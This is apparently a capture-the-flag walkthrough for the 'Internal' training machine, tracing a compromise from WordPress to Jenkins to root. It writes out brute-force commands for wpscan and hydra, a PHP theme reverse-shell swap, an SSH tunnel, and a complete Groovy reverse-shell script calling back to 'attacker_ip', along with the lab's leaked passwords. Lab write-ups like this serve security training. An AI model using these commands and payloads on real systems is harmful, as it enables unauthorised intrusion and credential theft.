Internal
Tasks:
- Pre-engagement Briefing:
- Get basic understanding that it's fully black box pentesting and you need to prove access by getting user.txt and root.txt.
- Deploy and Engage the Client Environment:
- Doing nmap scan with
nmap -sC -sV -T5 ip reveals port 22,80 open. Port 80 has Apache/2.4.29 running behind it.
- Use gobuster to find directories accessible to us :
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.10.8.96/" --threads=100 - /blog, /phpmyadmin seems interesting, /blog seems to be wordpress site.
- By seeing post here, we can confirm there is a user called admin.
- Let's now use wpscan to bruteforce admin credentials with
wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt -t 100 - [admin:my2boys], Now login as wordpress administrator with these credentials.
- Twenty Seventeen is the active theme, Go to theme editor , In 404.php template replace with Pentest-Money Reverse shell after changing required IP and PORT configurations. Also start netcat listener in another terminal using
nc -nlvp 1234 and open 404 page to get shell . [Location of theme can also obtained from wpscan output]
- Run
python -c 'import pty; pty.spawn("/bin/bash")' to get interactive shell.
- We find that there's a user called aubreanna by navigating to home and doing
ls, but we can't access that due to restrictions.
find / -type f -name "*.txt" | less - we find there's a interesting file /opt/wp-save.txt, cat /opt/wp-save.txt - we find aubreanna credentials [aubreanna:bubb13guM!@#123], Login as aubreanna using su aubreanna and the password as bubb13guM!@#123.cat /home/aubreanna/user.txt and submit user flag. Also notice there's a jenkins.txt . cat /home/aubreanna/jenkins.txt reveals internal jenkins service running at 172.17.0.2:8080.- Let's ssh exposing port 8080 locally to us to access jenkins
ssh -L 8080:172.17.0.2:8080 [email protected] .
- Open http://127.0.0.1:8080 in browser, it seems to be a jenkins login page, Let's use hydra to bruteforce password keeping default user as admin after intercepting request through burp -
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password' - hydra -l admin -P /usr/share/wordlists/rockyou.txt //127.0.0.1 -s 8080 http-post-form 'j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password' - [admin:spongebob]
- Start netcat listener using
nc -nlvp 1337
- Once logged in to jenkins instance using above credentials, Go to manage jenkins> Script Console and enter below exploit and run the script in jenkins to get reverse shell.
```
String host="attacker_ip";
int port=1337;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
ls -la reveals .dockerfile which suggests we are in a docker container- Using
find / -name *.txt | more - we find there is file /opt/note.txt, cat /opt/note.txt reveals root credentials for parent os running this container. [root:tr0ub13guM!@#123]
- Login using ssh :
ssh [email protected] and tr0ub13guM!@#123 as password.
cat /root/root.txt and submit flag.